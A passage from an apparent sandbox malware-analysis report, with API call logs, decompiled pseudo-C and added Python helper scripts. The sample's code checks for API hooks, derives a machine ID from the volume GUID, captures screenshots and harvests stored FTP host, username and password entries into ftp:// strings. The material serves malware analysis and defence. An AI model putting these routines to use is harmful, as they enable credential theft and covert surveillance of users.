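(0x74B5F9B0 is the GetFileAttributesExW address logged by the sandbox)."""
import struct
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple


@dataclass
class Module:
    name: str
    base: int
    size: int

    def contains(self, va: int) -> bool:
        return self.base <= va < self.base + self.size


@dataclass
class Redirect:
    kind: str
    target: Optional[int]   # destination VA; for indirect jumps the pointer slot instead
    indirect: bool = False


def first_byte_is_jmp(prologue: bytes) -> bool:
    """The sample's own test: one byte read and compared with 0xE9 (JMP rel32)."""
    return len(prologue) > 0 and prologue[0] == 0xE9


def decode_redirect(va: int, code: bytes) -> Optional[Redirect]:
    """Decode common 32-bit entry-point trampolines; None for a normal prologue."""
    if len(code) >= 5 and code[0] == 0xE9:                       # JMP rel32
        rel = struct.unpack_from("<i", code, 1)[0]
        return Redirect("jmp rel32", (va + 5 + rel) & 0xFFFFFFFF)
    if len(code) >= 2 and code[0] == 0xEB:                       # JMP rel8 (e.g. into a hot-patch pad)
        rel = struct.unpack_from("<b", code, 1)[0]
        return Redirect("jmp rel8", (va + 2 + rel) & 0xFFFFFFFF)
    if len(code) >= 6 and code[0:2] == b"\xFF\x25":              # JMP dword ptr [abs32]
        return Redirect("jmp [abs32]", struct.unpack_from("<I", code, 2)[0], indirect=True)
    if len(code) >= 6 and code[0] == 0x68 and code[5] == 0xC3:   # PUSH imm32; RET
        return Redirect("push/ret", struct.unpack_from("<I", code, 1)[0])
    if len(code) >= 7 and code[0] == 0xB8 and code[5:7] == b"\xFF\xE0":  # MOV EAX, imm32; JMP EAX
        return Redirect("mov eax/jmp eax", struct.unpack_from("<I", code, 1)[0])
    return None


def classify(name: str, va: int, prologue: bytes, modules: List[Module]) -> Dict[str, object]:
    """Judge whether `name` at `va` is hooked, using the module map to rate the destination."""
    owner = next((m for m in modules if m.contains(va)), None)
    r = decode_redirect(va, prologue)
    result: Dict[str, object] = {"function": name, "hooked": False, "kind": None,
                                 "target": None, "target_module": None}
    if r is None:
        result["reason"] = "normal prologue"
        return result
    result["kind"], result["target"] = r.kind, r.target
    if r.indirect:
        result["reason"] = "indirect jump at entry: read the pointer slot before deciding"
        return result
    dest = next((m for m in modules if m.contains(r.target)), None)
    result["target_module"] = dest.name if dest else None
    if dest is not None and owner is not None and dest.name == owner.name:
        result["reason"] = "jump stays inside the owning module (compiler stub or hot-patch); verify manually"
        return result
    result["hooked"] = True
    result["reason"] = "entry jumps into %s" % (dest.name if dest else "unmapped/unknown memory")
    return result


def scan(prologues: Dict[str, Tuple[int, bytes]], modules: List[Module]) -> List[str]:
    """Names of the functions whose entry is judged hooked. prologues: name -> (va, bytes)."""
    return [n for n, (va, code) in prologues.items() if classify(n, va, code, modules)["hooked"]]


# Constructed input: a kernel32 export with a clean hot-patchable prologue, the same export
# redirected by a JMP rel32 into a foreign region, and one that starts with an indirect-jump stub.
MODULES = [Module("kernel32.dll", 0x74B50000, 0x110000), Module("hook.dll", 0x10000000, 0x20000)]
API_VA = 0x74B5F9B0
CLEAN = bytes.fromhex("8BFF558BEC")                                 # mov edi,edi; push ebp; mov ebp,esp
HOOKED = b"\xE9" + struct.pack("<i", 0x10001000 - (API_VA + 5))      # jmp 0x10001000
INDIRECT = b"\xFF\x25" + struct.pack("<I", 0x74B51000)               # jmp dword ptr [0x74B51000]

SAMPLE: Dict[str, Tuple[int, bytes]] = {
    "GetFileAttributesExW": (API_VA, HOOKED),
    "GetFileAttributesW": (API_VA + 0x40, CLEAN),
    "ReadProcessMemory": (API_VA + 0x80, INDIRECT),
}

if __name__ == "__main__":
    for n, (va, code) in SAMPLE.items():
        print(classify(n, va, code, MODULES))
    print("hooked:", scan(SAMPLE, MODULES))
```

The single-byte test the sample relies on is also what it is blind to: an `FF 25` import stub or a hook placed with an absolute indirect jump does not start with 0xE9, and a rel32 JMP whose target stays inside kernel32 is not by itself a hook, which is why the classifier reports those two cases separately instead of calling them hooked or clean.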

                APIs
                • SetErrorMode.KERNEL32(00008007,00000000), ref: 00407FAA
                • GetCommandLineW.KERNEL32(?), ref: 00407FB4
                • CommandLineToArgvW.SHELL32(00000000), ref: 00407FBB
                • LocalFree.KERNEL32(00000000), ref: 00407FF7
                • CreateMutexW.KERNEL32(0041930C,00000001,?,38901130,?,00000001,?), ref: 00408065
                • OpenEventW.KERNEL32(00000002,00000000,?,2A43533F,?,00000001), ref: 004080A1
                • SetEvent.KERNEL32(00000000), ref: 004080B4
                • CloseHandle.KERNEL32(00000000), ref: 004080BB
                • CloseHandle.KERNEL32(?,00000001), ref: 004080CB
                • OpenMutexW.KERNEL32(00100000,00000000,?,19367400,?,00000001,8789347B,00000002), ref: 0040810D
                • CloseHandle.KERNEL32(00000000), ref: 00408124
                • ReadProcessMemory.KERNEL32(000000FF,74B5F9B0,?,00000001,00000000), ref: 00408137
                • Sleep.KERNEL32(000001F4), ref: 00408148
                • IsWellKnownSid.ADVAPI32(0201F7D0,00000016), ref: 00408159
                • ReadProcessMemory.KERNEL32(000000FF,74B5F9B0,?,00000001,00000000), ref: 0040817E
                • GetFileAttributesExW.KERNEL32({F0CFCAE1-4272-0517-A2A0-B1E71D94040E},78F16360,?), ref: 00408198
                • VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?), ref: 004081D6
                • CreateEventW.KERNEL32(0041930C,00000001,00000000,?,2A43533F,?,00000001,?,?,00000000,C:\Users\Jamey\AppData\Roaming,00000000,?,?,?), ref: 00408249
                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0040825F
                • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 0040826E
                • CloseHandle.KERNEL32(?), ref: 0040827C
                • CloseHandle.KERNEL32(?), ref: 0040828B
                • CloseHandle.KERNEL32(?), ref: 0040828E
                • Sleep.KERNEL32(000000FF), ref: 004082C3
                • ExitProcess.KERNEL32 ref: 004082D8
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_executable.jbxd
                Yara matches
                Similarity
                • API ID: CloseHandle$EventProcess$CommandCreateFreeLineMemoryMutexOpenReadSleepWait$ArgvAttributesErrorExitFileKnownLocalModeMultipleObjectObjectsSingleVirtualWell
                • String ID: C:\Users\Jamey\AppData\Roaming${F0CFCAE1-4272-0517-A2A0-B1E71D94040E}
                • API String ID: 739993762-2180284786
                • Opcode ID: 9b0f315999aba71745f81306310f641b9d9c67a93e3f66e7ae6530fe6061d80a
                • Instruction ID: 7a98628b8e0f37e50ff5711c1732d73829a2b38de0a3c91ac5a033fc6744bbb5
                • Opcode Fuzzy Hash: 9b0f315999aba71745f81306310f641b9d9c67a93e3f66e7ae6530fe6061d80a
                • Instruction Fuzzy Hash: 5DA1A37140424CAFDF20AFA0CD45AEE3BA9AF05304F14407EFA65B61E2CB389C45CB69
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                C-Code - Quality: 32%
                			E0040E8FE() {
                				void* _t21;
                				void* _t29;
                				void* _t30;
                				void* _t31;
                				void* _t34;
                				intOrPtr* _t36;
                				void* _t37;
                				void* _t40;
                				void* _t42;
                
                				_t40 = _t42 - 0x74;
                				_t31 = 0; // executed
                				// CSIDL_WINDOWS == 0x24: start from the Windows directory (wide-char path buffer at _t40-0x25c). The next test reads the HRESULT in eax, which the decompiler renders as the constant 0.
                				__imp__SHGetFolderPathW(0, 0x24, 0, 0, _t40 - 0x25c, _t34, _t37, _t30); // executed
                				if(0 != 0) {
                					L8:
                					// Fallback when no volume name can be derived: E00409898 fills the caller's 16-byte output (first argument, ebp+8 == _t40+0x7c) by some other means.
                					E00409898( *((intOrPtr*)(_t40 + 0x7c)), 0x10);
                				} else {
                					PathAddBackslashW(_t40 - 0x25c);
                					_t36 = __imp__GetVolumeNameForVolumeMountPointW;
                					// Climb the directory tree until the path is a volume mount point; the name (up to 0x64 wide chars at _t40-0x54) has the form \\?\Volume{GUID}\.
                					while(1) {
                						_t21 =  *_t36(_t40 - 0x25c, _t40 - 0x54, 0x64); // executed
                						if(_t21 != 0) {
                							break;
                						}
                						PathRemoveBackslashW(_t40 - 0x25c);
                						if(PathRemoveFileSpecW(_t40 - 0x25c) == 0) { // nothing left to strip: give up
                							goto L8;
                						} else {
                							PathAddBackslashW(_t40 - 0x25c);
                							continue;
                						}
                						goto L9;
                					}
                					// _t40-0x40 is wide char 10 of the volume name, the '{' after "\\?\Volume"; _t40+0xc is wide char 48, just past the 38-character
                					// "{GUID}", which is NUL-terminated there so that CLSIDFromString sees only the GUID. The parsed value (the volume GUID of the
                					// volume holding the Windows directory, a stable per-machine identifier) is written to the output at _t40+0x7c.
                					if( *((short*)(_t40 - 0x40)) != 0x7b) {
                						goto L8;
                					} else {
                						 *((short*)(_t40 + 0xc)) = 0;
                						_t29 = _t40 - 0x40;
                						__imp__CLSIDFromString(_t29,  *((intOrPtr*)(_t40 + 0x7c)));
                						if(_t29 != 0) { // tests the HRESULT in eax (S_OK == 0), not _t29 as rendered
                							goto L8;
                						} else {
                							_t31 = 1;
                						}
                					}
                				}
                				L9:
                				return _t31;
                			}

                • Address column: 0x0040e8ff .. 0x0040e9ac (per-line addresses of the E0040E8FE code above; the column was detached from the code lines in this export)
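E0040E8FE is a small algorithm worth having in a form that runs outside the sample: climb from a start directory until GetVolumeNameForVolumeMountPointW answers, require the '{' at character 10 of the \\?\Volume{GUID}\ name, cut out the 38-character GUID text and parse it the way CLSIDFromString does. The script below, added here as a worked example and not code from the sample, reproduces that walk against a constructed mount table standing in for the Windows API (the real function succeeds only for paths that are mount points, with a trailing backslash), and returns the GUID in the in-memory layout CLSIDFromString writes (Data1..Data3 little-endian). The two volume GUIDs in the table are made up for the example. It also exercises the failure path the sample handles by jumping to its fallback: a directory on a volume with no mount point in the table.

```python
"""Reproduce the walk in E0040E8FE: climb from a start directory to the nearest volume
mount point and turn its \\?\Volume{GUID}\ name into the 16-byte GUID layout that
CLSIDFromString writes. Added example; not code from the sample. The mount table and
its GUIDs are constructed test data."""
import uuid
from typing import Callable, Dict, Optional

VOLUME_PREFIX = "\\\\?\\Volume{"   # 11 characters; the sample tests the '{' at wide-char index 10
GUID_TEXT_LEN = 38                  # "{xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx}"


def _remove_file_spec(path: str) -> Optional[str]:
    """PathRemoveFileSpecW on a path without trailing backslash: drop the last component,
    None when there is nothing left to remove (the root has been reached)."""
    cut = path.rfind("\\")
    if cut <= 0:
        return None
    parent = path[:cut]
    if parent.endswith(":"):      # keep the root in its "C:\" form
        parent += "\\"
    return parent


def nearest_volume_name(start_dir: str, query: Callable[[str], Optional[str]]) -> Optional[str]:
    """The loop in E0040E8FE. `query` stands in for GetVolumeNameForVolumeMountPointW:
    it returns the \\?\Volume{GUID}\ name for a mount point and None for any other path."""
    path = start_dir if start_dir.endswith("\\") else start_dir + "\\"   # PathAddBackslashW
    while True:
        name = query(path)
        if name is not None:
            return name
        parent = _remove_file_spec(path.rstrip("\\"))   # PathRemoveBackslashW + PathRemoveFileSpecW
        if parent is None:
            return None                                  # the sample jumps to its fallback (L8) here
        path = parent if parent.endswith("\\") else parent + "\\"


def volume_guid_bytes(volume_name: str) -> Optional[bytes]:
    """Same validation as the sample: '{' must sit at index 10; the 38-character GUID text is
    cut out and parsed. Returns the GUID in its in-memory layout (little-endian Data1..Data3,
    what CLSIDFromString stores), or None where CLSIDFromString would fail."""
    if len(volume_name) < len(VOLUME_PREFIX) - 1 + GUID_TEXT_LEN or volume_name[10] != "{":
        return None
    text = volume_name[10:10 + GUID_TEXT_LEN]
    try:
        return uuid.UUID(text).bytes_le
    except ValueError:
        return None


def machine_id(start_dir: str, query: Callable[[str], Optional[str]]) -> Optional[bytes]:
    """Volume GUID of the volume holding `start_dir`, as E0040E8FE derives it from CSIDL_WINDOWS."""
    name = nearest_volume_name(start_dir, query)
    return volume_guid_bytes(name) if name is not None else None


# Constructed mount table: the system volume plus a volume mounted on a folder. GUIDs are made up.
MOUNTS: Dict[str, str] = {
    "C:\\": "\\\\?\\Volume{0f5f3a3c-8d8f-4b0e-9a1e-2c7d1c9b6a10}\\",
    "C:\\Mount\\Data\\": "\\\\?\\Volume{5d1b2a90-77ab-4c3e-8e61-0a9f3c2b1d44}\\",
}


def lookup(path: str) -> Optional[str]:
    """Stand-in for GetVolumeNameForVolumeMountPointW: exact match on a backslash-terminated path."""
    return MOUNTS.get(path)


if __name__ == "__main__":
    for start in ("C:\\Windows", "C:\\Mount\\Data\\Sub\\Dir", "D:\\Tools"):
        guid = machine_id(start, lookup)
        print(start, "->", guid.hex() if guid else "no mount point found (fallback path)")
```

Two details carry over from the decompiled code. The byte order matters when such a value is later hashed or compared: `bytes_le` matches the GUID structure CLSIDFromString fills, while the textual form or `uuid.UUID(...).bytes` would differ in the first three fields. And a directory on a volume that is mounted somewhere the walk never reaches returns None, which is exactly where E0040E8FE falls back to E00409898 instead of failing.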

                APIs
                • SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?,?,00000000,00000000), ref: 0040E91C
                • PathAddBackslashW.SHLWAPI(?,?,00000000,00000000), ref: 0040E933
                • PathRemoveBackslashW.SHLWAPI(?,?,00000000,00000000), ref: 0040E944
                • PathRemoveFileSpecW.SHLWAPI(?,?,00000000,00000000), ref: 0040E951
                • PathAddBackslashW.SHLWAPI(?,?,00000000,00000000), ref: 0040E962
                • GetVolumeNameForVolumeMountPointW.KERNELBASE(?,?,00000064,?,00000000,00000000), ref: 0040E971
                • CLSIDFromString.OLE32(?,?,?,00000000,00000000), ref: 0040E98B
                Memory Dump Source
                • Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_executable.jbxd
                Yara matches
                Similarity
                • API ID: Path$Backslash$RemoveVolume$FileFolderFromMountNamePointSpecString
                • String ID:
                • API String ID: 613918483-0
                • Opcode ID: 1c684ae22dd1a15f28b70c8a71950f99228b951abd413f9284cdc6286ba94ad7
                • Instruction ID: 1122e30d96f58a50b627d60d82b2c9d09932d48efdd782f702a96aa87a7cd282
                • Opcode Fuzzy Hash: 1c684ae22dd1a15f28b70c8a71950f99228b951abd413f9284cdc6286ba94ad7
                • Instruction Fuzzy Hash: B21151B15012199EDB20DBB2DD48EDB77BCAB44301F10487BA615F3150E638DA188B68
                Uniqueness

                Uniqueness Score: -1.00%

                Non-executed Functions

                Control-flow Graph

                • Executed
                • Not Executed
                (control-flow graph image for the function at 0x411408; basic-block edge list omitted)
                C-Code - Quality: 39%
                			E00411408(WCHAR* _a4, char _a8, signed short _a12) {
                				struct HINSTANCE__* _v12;
                				struct HINSTANCE__* _v16;
                				struct HINSTANCE__* _v20;
                				_Unknown_base(*)()* _v24;
                				void* _v28;
                				void* _v32;
                				struct HDC__* _v36;
                				_Unknown_base(*)()* _v40;
                				_Unknown_base(*)()* _v44;
                				struct tagPOINT _v52;
                				_Unknown_base(*)()* _v56;
                				struct HINSTANCE__* _v60;
                				_Unknown_base(*)()* _v64;
                				_Unknown_base(*)()* _v68;
                				_Unknown_base(*)()* _v72;
                				_Unknown_base(*)()* _v76;
                				_Unknown_base(*)()* _v80;
                				_Unknown_base(*)()* _v84;
                				_Unknown_base(*)()* _v88;
                				struct HINSTANCE__* _v92;
                				struct HINSTANCE__* _v96;
                				struct HINSTANCE__* _v100;
                				char _v104;
                				_Unknown_base(*)()* _v108;
                				intOrPtr _v112;
                				char _v116;
                				_Unknown_base(*)()* _v120;
                				char _v148;
                				signed int _v152;
                				struct _ICONINFO _v172;
                				char _v188;
                				struct HINSTANCE__* _t169;
                				_Unknown_base(*)()* _t176;
                				struct HINSTANCE__* _t181;
                				_Unknown_base(*)()* _t182;
                				struct HINSTANCE__* _t183;
                				_Unknown_base(*)()* _t191;
                				struct HDC__* _t197;
                				struct HICON__* _t199;
                				signed int _t200;
                				intOrPtr _t202;
                				intOrPtr _t204;
                				void* _t206;
                				void* _t223;
                				intOrPtr* _t224;
                				int _t239;
                				void* _t246;
                				int _t251;
                				unsigned int _t256;
                				intOrPtr* _t258;
                				signed short _t259;
                				intOrPtr _t260;
                				WCHAR** _t261;
                				intOrPtr _t264;
                				signed int _t265;
                				signed int _t268;
                				void* _t271;
                
                				_v32 = 0;
                				_v60 = 0;
                				_v16 = 0;
                				_v104 = 1;
                				_v100 = 0;
                				_v96 = 0;
                				_v92 = 0;
                				_t169 = LoadLibraryA("gdiplus.dll");
                				_v20 = _t169;
                				_v24 = GetProcAddress(_t169, "GdiplusStartup");
                				_v80 = GetProcAddress(_v20, "GdiplusShutdown");
                				_v88 = GetProcAddress(_v20, "GdipCreateBitmapFromHBITMAP");
                				_v72 = GetProcAddress(_v20, "GdipDisposeImage");
                				_v40 = GetProcAddress(_v20, "GdipGetImageEncodersSize");
                				_v64 = GetProcAddress(_v20, "GdipGetImageEncoders");
                				_t176 = GetProcAddress(_v20, "GdipSaveImageToStream");
                				_v108 = _t176;
                				if(_v24 == 0 || _v80 == 0 || _v88 == 0 || _v72 == 0 || _v40 == 0 || _v64 == 0 || _t176 == 0) {
                					L74:
                					if(_v20 != 0) {
                						FreeLibrary(_v20);
                					}
                					if(_v60 != 0) {
                						FreeLibrary(_v60);
                					}
                					if(_v16 != 0) {
                						FreeLibrary(_v16);
                					}
                					return _v32;
                				} else {
                					_t181 = LoadLibraryA("ole32.dll");
                					_v60 = _t181;
                					_t182 = GetProcAddress(_t181, "CreateStreamOnHGlobal");
                					_v120 = _t182;
                					if(_t182 == 0) {
                						goto L74;
                					}
                					_t183 = LoadLibraryA("gdi32.dll");
                					_v16 = _t183;
                					_t258 = GetProcAddress(_t183, "CreateDCW");
                					_v12 = GetProcAddress(_v16, "CreateCompatibleDC");
                					_v44 = GetProcAddress(_v16, "CreateCompatibleBitmap");
                					_v28 = GetProcAddress(_v16, "GetDeviceCaps");
                					_v56 = GetProcAddress(_v16, "SelectObject");
                					_v76 = GetProcAddress(_v16, "BitBlt");
                					_v84 = GetProcAddress(_v16, "DeleteObject");
                					_t191 = GetProcAddress(_v16, "DeleteDC");
                					_v68 = _t191;
                					if(_t258 == 0 || _v12 == 0 || _v44 == 0 || _v28 == 0 || _v56 == 0 || _v76 == 0 || _v84 == 0 || _t191 == 0) {
                						goto L74;
                					} else {
                						_push(0);
                						_push( &_v104);
                						_push( &_v116);
                						_v104 = 1;
                						_v100 = 0;
                						_v96 = 0;
                						_v92 = 0;
                						if(_v24() != 0) {
                							goto L74;
                						}
                						_t264 =  *_t258(L"DISPLAY", 0, 0, 0);
                						_v24 = _t264;
                						if(_t264 == 0) {
                							L73:
                							_v80(_v116);
                							goto L74;
                						}
                						_t197 = _v12(_t264);
                						_v36 = _t197;
                						if(_t197 == 0) {
                							L72:
                							_v68(_v24);
                							goto L73;
                						}
                						_t199 = LoadImageW(0, 0x7f00, 2, 0, 0, 0x8040);
                						_v12 = _t199;
                						if(_t199 == 0) {
                							L24:
                							_t259 = 0;
                							goto L26;
                						} else {
                							if(GetIconInfo(_t199,  &_v172) == 0 || GetCursorPos( &_v52) == 0) {
                								_v12 = 0;
                							}
                							if(_v12 != 0) {
                								_t259 = _a12;
                								L26:
                								if(_t259 == 0) {
                									_t200 = _v28(_t264, 8);
                									_t265 = _t200;
                									_a12 = _v28(_v24, 0xa);
                								} else {
                									_t265 = _t259 & 0x0000ffff;
                									_a12 = _t265;
                								}
                								_t202 = _v44(_v24, _t265, _a12);
                								_v44 = _t202;
                								if(_t202 == 0) {
                									L71:
                									_v68(_v36);
                									goto L72;
                								} else {
                									_t204 = _v56(_v36, _t202);
                									_v112 = _t204;
                									if(_t204 == 0) {
                										L70:
                										_v84(_v44);
                										goto L71;
                									}
                									_t206 = 0;
                									_t246 = 0;
                									if(_t259 != 0) {
                										_t256 = (_t259 & 0x0000ffff) >> 1;
                										_t206 = _v52.x - _t256;
                										if(_t206 < 0) {
                											_t206 = 0;
                										}
                										_t246 = _v52.y - _t256;
                										if(_t246 < 0) {
                											_t246 = 0;
                										}
                										_t81 =  &_v52;
                										 *_t81 = _v52.x - _t206;
                										if( *_t81 < 0) {
                											_v52.x = 0;
                										}
                										_t84 =  &(_v52.y);
                										 *_t84 = _v52.y - _t246;
                										if( *_t84 < 0) {
                											_v52.y = 0;
                										}
                									}
                									_push(0x40cc0020);
                									_push(_t246);
                									_push(_t206);
                									_push(_v24);
                									_push(_a12);
                									_push(_t265);
                									_push(0);
                									_push(0);
                									_push(_v36);
                									if(_v76() == 0) {
                										L69:
                										_v56(_v36, _v112);
                										goto L70;
                									} else {
                										if(_v12 != 0) {
                											_t251 = _v52.x - _v172.xHotspot;
                											if(_t251 < 0) {
                												_t251 = 0;
                											}
                											_t239 = _v52.y - _v172.yHotspot;
                											if(_t239 < 0) {
                												_t239 = 0;
                											}
                											DrawIcon(_v36, _t251, _t239, _v12);
                										}
                										_push( &_v12);
                										_push(0);
                										_push(_v44);
                										_v12 = 0;
                										if(_v88() != 0 || _v12 == 0) {
                											goto L69;
                										} else {
                											_push( &_v28);
                											_push( &_a12);
                											_a12 = 0;
                											_v28 = 0;
                											if(_v40() != 0) {
                												L68:
                												_v72(_v12);
                												goto L69;
                											}
                											_t215 = _v28;
                											if(_v28 == 0 || _a12 == 0) {
                												goto L68;
                											} else {
                												_t260 = E004097CC(_t215);
                												_v40 = _t260;
                												if(_t260 == 0) {
                													goto L68;
                												}
                												_push(_t260);
                												_push(_v28);
                												_push(_a12);
                												if(_v64() != 0) {
                													L60:
                													E004097F7(_v40);
                													if(_a12 == 0) {
                														_push( &_v32);
                														_push(1);
                														_push(0);
                														if(_v120() == 0 && _v32 != 0) {
                															_v152 = 0;
                															if(_a8 > 0) {
                																E00409833( &_v148, 0x402990, 0x10);
                																 *((intOrPtr*)(_t271 + _v152 * 0x1c - 0x7c)) = 4;
                																 *((intOrPtr*)(_t271 + _v152 * 0x1c - 0x80)) = 1;
                																 *((intOrPtr*)(_t271 + _v152 * 0x1c - 0x78)) =  &_a8;
                																_v152 = _v152 + 1;
                															}
                															_t223 = _v108(_v12, _v32,  &_v188,  &_v152);
                															_t224 = _v32;
                															if(_t223 == 0) {
                																 *((intOrPtr*)( *_t224 + 0x14))(_t224, 0, 0, 0, 0);
                															} else {
                																 *((intOrPtr*)( *_t224 + 8))(_t224);
                																_v32 = 0;
                															}
                														}
                													}
                													goto L68;
                												}
                												_t268 = 0;
                												if(_a12 <= 0) {
                													goto L60;
                												}
                												_t261 = _t260 + 0x30;
                												while(lstrcmpiW(_a4,  *_t261) != 0) {
                													_t268 = _t268 + 1;
                													_t261 =  &(_t261[0x13]);
                													if(_t268 < _a12) {
                														continue;
                													}
                													goto L60;
                												}
                												E00409833( &_v188, _t268 * 0x4c + _v40, 0x10);
                												_a12 = 0;
                												goto L60;
                											}
                										}
                									}
                								}
                							}
                							goto L24;
                						}
                					}
                				}
                			}

                APIs
                • LoadLibraryA.KERNEL32(gdiplus.dll,00000000,?,00000000), ref: 0041143A
                • GetProcAddress.KERNEL32(00000000,GdiplusStartup), ref: 0041144B
                • GetProcAddress.KERNEL32(00000000,GdiplusShutdown), ref: 00411458
                • GetProcAddress.KERNEL32(00000000,GdipCreateBitmapFromHBITMAP), ref: 00411465
                • GetProcAddress.KERNEL32(00000000,GdipDisposeImage), ref: 00411472
                • GetProcAddress.KERNEL32(00000000,GdipGetImageEncodersSize), ref: 0041147F
                • GetProcAddress.KERNEL32(00000000,GdipGetImageEncoders), ref: 0041148C
                • GetProcAddress.KERNEL32(00000000,GdipSaveImageToStream), ref: 00411499
                • LoadLibraryA.KERNEL32(ole32.dll), ref: 004114E1
                • GetProcAddress.KERNEL32(00000000,CreateStreamOnHGlobal), ref: 004114EC
                • LoadLibraryA.KERNEL32(gdi32.dll), ref: 004114FE
                • GetProcAddress.KERNEL32(00000000,CreateDCW), ref: 00411509
                • GetProcAddress.KERNEL32(00000000,CreateCompatibleDC), ref: 00411515
                • GetProcAddress.KERNEL32(00000000,CreateCompatibleBitmap), ref: 00411522
                • GetProcAddress.KERNEL32(00000000,GetDeviceCaps), ref: 0041152F
                • GetProcAddress.KERNEL32(00000000,SelectObject), ref: 0041153C
                • GetProcAddress.KERNEL32(00000000,BitBlt), ref: 00411549
                • GetProcAddress.KERNEL32(00000000,DeleteObject), ref: 00411556
                • GetProcAddress.KERNEL32(00000000,DeleteDC), ref: 00411563
                • LoadImageW.USER32 ref: 00411607
                • GetIconInfo.USER32(00000000,?), ref: 0041161C
                • GetCursorPos.USER32(?), ref: 0041162A
                • DrawIcon.USER32 ref: 004116FF
                • lstrcmpiW.KERNEL32(?,-00000030), ref: 00411780
                • FreeLibrary.KERNEL32(00000000), ref: 00411897
                • FreeLibrary.KERNEL32(?), ref: 004118A1
                • FreeLibrary.KERNEL32(00000000), ref: 004118AB
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_executable.jbxd
                Yara matches
                Similarity
                • API ID: AddressProc$Library$Load$Free$Icon$CursorDrawImageInfolstrcmpi
                • String ID: BitBlt$CreateCompatibleBitmap$CreateCompatibleDC$CreateDCW$CreateStreamOnHGlobal$DISPLAY$DeleteDC$DeleteObject$GdipCreateBitmapFromHBITMAP$GdipDisposeImage$GdipGetImageEncoders$GdipGetImageEncodersSize$GdipSaveImageToStream$GdiplusShutdown$GdiplusStartup$GetDeviceCaps$SelectObject$gdi32.dll$gdiplus.dll$ole32.dll
                • API String ID: 1554524784-1167942225
                • Opcode ID: f6d3b8b0de9bacf613a8fab8841c7e8015a74c2b07552cefa7120845549c1a7c
                • Instruction ID: d672870f6b023e75ecf8434e3e900a2fa9532427c940171f4d6bc6410fb55e56
                • Opcode Fuzzy Hash: f6d3b8b0de9bacf613a8fab8841c7e8015a74c2b07552cefa7120845549c1a7c
                • Instruction Fuzzy Hash: 6EE1C371E00219AFCF20AFE1CD88AEEBBB9BF04341F14456BE615B6260D7795981CF58
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                (control-flow graph image for the function at 0x405841; basic-block edge list omitted)
                C-Code - Quality: 90%
                			E00405841(void* __edx, WCHAR* _a4) {
                				intOrPtr _v0;
                				WCHAR* _v4;
                				intOrPtr _v8;
                				WCHAR* _v12;
                				intOrPtr _v16;
                				WCHAR* _v20;
                				void* __edi;
                				WCHAR* _t20;
                				long _t21;
                				void* _t25;
                				WCHAR* _t30;
                				void* _t38;
                				WCHAR* _t40;
                				WCHAR* _t47;
                				WCHAR* _t48;
                				intOrPtr _t50;
                				WCHAR** _t54;
                
                				_t44 = __edx;
                				_t54 =  &_v12;
                				_t20 = HeapAlloc( *0x41a570, 8, 0x20002);
                				_t40 = _t20;
                				_v4 = _t40;
                				if(_t40 == 0) {
                					return _t20;
                				}
                				_t21 = GetPrivateProfileStringW(0, 0, 0, _t40, 0xffff, _a4);
                				if(_t21 <= 0) {
                					L16:
                					return E004097F7(_t40);
                				}
                				_t3 = _t21 + 1; // 0x1
                				if(E0040A6AE(_t40, _t3) == 0) {
                					goto L16;
                				}
                				_t25 = HeapAlloc( *0x41a570, 8, 0xc0c);
                				_v12 = _t25;
                				if(_t25 != 0) {
                					_v8 = _t25 + 0x5fa;
                					do {
                						if(StrStrIW(_t40, L"connections") == 0) {
                							_t30 = StrStrIW(_t40, L"default");
                							if(_t30 == 0) {
                								_t47 = _v20;
                								if(GetPrivateProfileStringW(_t40, L"host", _t30, _t47, 0xff, _v4) > 0) {
                									_t48 =  &(_t47[0xff]);
                									if(GetPrivateProfileStringW(_t40, L"username", 0, _t48, 0xff, _v4) > 0 && GetPrivateProfileStringW(_t40, L"password", 0,  &(_t48[0xff]), 0xff, _v4) > 0 && E004056E2(_t44,  &(_t48[0xff])) > 0) {
                										_push(_v20);
                										_push( &(_t48[0xff]));
                										_push(_t48);
                										_t49 = _v16;
                										_t44 = 0x307;
                										_t38 = E0040A4B7( &(_t48[0xff]), 0x307, _v16, L"ftp://%s:%s@%s\n");
                										_t54 =  &(_t54[4]);
                										if(_t38 > 0) {
                											_t50 = _v0;
                											if(E00409B2A(_t38, _t50, _t49) != 0) {
                												 *((intOrPtr*)(_t50 + 4)) =  *((intOrPtr*)(_t50 + 4)) + 1;
                											}
                										}
                									}
                								}
                							}
                						}
                						_t40 = E0040A6EC(_t40, 1);
                					} while (_t40 != 0);
                					E004097F7(_v16);
                					_t40 = _v12;
                				}
                			}

                APIs
                • HeapAlloc.KERNEL32(00000008,00020002,?,?,?,?,?), ref: 0040585B
                • GetPrivateProfileStringW.KERNEL32 ref: 00405880
                • HeapAlloc.KERNEL32(00000008,00000C0C,?,?,?,?,?), ref: 004058A9
                • StrStrIW.SHLWAPI(00000000,connections,?,?,?,?,?), ref: 004058D1
